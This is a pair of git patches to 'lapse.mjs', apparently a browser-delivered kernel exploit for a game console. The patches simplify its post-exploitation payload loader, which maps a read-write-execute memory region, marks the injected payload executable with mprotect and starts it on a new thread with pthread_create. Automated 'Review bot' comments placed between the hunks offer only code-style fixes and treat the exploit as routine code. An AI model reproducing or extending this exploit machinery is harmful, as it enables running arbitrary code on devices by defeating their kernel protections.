From 19c2ae770906d2fa4842fe4815c26ca773a8de01 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?J=C4=81nis?= <97699850+janisslsm@users.noreply.github.com>
Date: Sun, 18 May 2025 00:24:42 +0300
Subject: [PATCH 1/2] simplified payload loader code
---
 lapse.mjs | 38 ++++++++------------------------------
 1 file changed, 8 insertions(+), 30 deletions(-)
diff --git a/lapse.mjs b/lapse.mjs
index eaa7dff..36ddc33 100644
--- a/lapse.mjs
+++ b/lapse.mjs
@@ -140,7 +140,6 @@ const num_leaks = 5;
 const num_clobbers = 8;
 let chain = null;
-var nogc = [];
 async function init() {
 await rop.init();
 chain = new Chain();
@@ -1736,39 +1735,18 @@ export async function kexploit() {
 }
 kexploit().then(() => {
- function malloc(sz) {
- var backing = new Uint8Array(0x10000 + sz);
- nogc.push(backing);
- var ptr = mem.readp(mem.addrof(backing).add(0x10));
- ptr.backing = backing;
- return ptr;
- }
-
- function malloc32(sz) {
- var backing = new Uint8Array(0x10000 + sz * 4);
- nogc.push(backing);
- var ptr = mem.readp(mem.addrof(backing).add(0x10));
- ptr.backing = new Uint32Array(backing.buffer);
- return ptr;
- }
- window.pld_size = new Int(0x26200000, 0x9);
-
- var payload_buffer = chain.sysp('mmap', window.pld_size, 0x300000, 7, 0x41000, -1, 0);
- var payload = window.pld;
- var bufLen = payload.length * 4
- var payload_loader = malloc32(bufLen);
- var loader_writer = payload_loader.backing;
- for (var i = 0; i < payload.length; i++) {
- loader_writer[i] = payload[i];
- }
- chain.sys('mprotect', payload_loader, bufLen, (0x1 | 0x2 | 0x4));
- var pthread = malloc(0x10);
+ var payload_buffer = chain.sysp('mmap', new Int(0x26200000, 0x9), 0x300000, 7, 0x41000, -1, 0);
+ var payload_loader = new View4(window.pld);
+ chain.sys('mprotect', payload_loader.addr, payload_loader.size, (0x1 | 0x2 | 0x4));
+ const ctx = new Buffer(0x10);
+ const pthread = new Pointer();
+ pthread.ctx = ctx;
 call_nze(
 'pthread_create',
- pthread,
+ pthread.addr,
 0,
- payload_loader,
+ payload_loader.addr,
 payload_buffer,
 );
 })
\ No newline at end of file
From f9c7ae48e4901f8dd5688adc829e7d46ee435b1d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?J=C4=81nis?= <97699850+janisslsm@users.noreply.github.com>
Date: Sun, 18 May 2025 00:32:53 +0300
Subject: [PATCH 2/2] add constants for mprotect
---
 lapse.mjs | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/lapse.mjs b/lapse.mjs
index 36ddc33..f3f8919 100644
--- a/lapse.mjs
+++ b/lapse.mjs
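Review bot: The six added lines mix declaration styles inside one callback — `+ var payload_buffer` and `+ var payload_loader` sit next to `+ const ctx` and `+ const pthread` — and neither `var` binding is reassigned afterwards, so both should read `const payload_buffer = ...` and `const payload_loader = ...` to match the two lines that follow them. The `kexploit().then(() => { ... })` chain, whose start and closing `})` are both inside this hunk, still has no rejection handler, so a rejected kexploit() promise or an exception thrown inside the callback (for instance from call_nze, if it throws on failure as its name suggests) is reported only as an unhandled rejection; closing the chain with `}).catch((err) => { console.error(err); });` keeps such a failure visible. The commit also leaves the file without a trailing newline (`\ No newline at end of file`) even though it rewrites the last line.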
@@ -96,6 +96,9 @@ const CPU_LEVEL_WHICH = 3;
 const CPU_WHICH_TID = 1;
 // sys/mman.h
+const PROT_READ = 1;
+const PROT_WRITE = 2;
+const PROT_EXEC = 4;
 const MAP_SHARED = 1;
 const MAP_FIXED = 0x10;
@@ -1737,7 +1740,7 @@ export async function kexploit() {
 kexploit().then(() => {
 var payload_buffer = chain.sysp('mmap', new Int(0x26200000, 0x9), 0x300000, 7, 0x41000, -1, 0);
 var payload_loader = new View4(window.pld);
- chain.sys('mprotect', payload_loader.addr, payload_loader.size, (0x1 | 0x2 | 0x4));
+ chain.sys('mprotect', payload_loader.addr, payload_loader.size, PROT_READ | PROT_WRITE | PROT_EXEC);
 const ctx = new Buffer(0x10);
 const pthread = new Pointer();
 pthread.ctx = ctx;
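Review bot: The mmap call two lines above the changed line still passes the same protection mask as a bare `7`, so the commit replaces the literal only on the mprotect line; for consistency that context line should become `var payload_buffer = chain.sysp('mmap', new Int(0x26200000, 0x9), 0x300000, PROT_READ | PROT_WRITE | PROT_EXEC, 0x41000, -1, 0);`. The flags argument `0x41000` on the same line is likewise an unnamed literal and would fit beside the `MAP_SHARED`/`MAP_FIXED` definitions in the `// sys/mman.h` group that the first hunk extends, but the names those bits correspond to are not defined anywhere in the sections shown here, so the author should confirm them before naming them. The callback being edited continues past the hunk's last line; its `call_nze(...)` tail and closing `})` are not visible here.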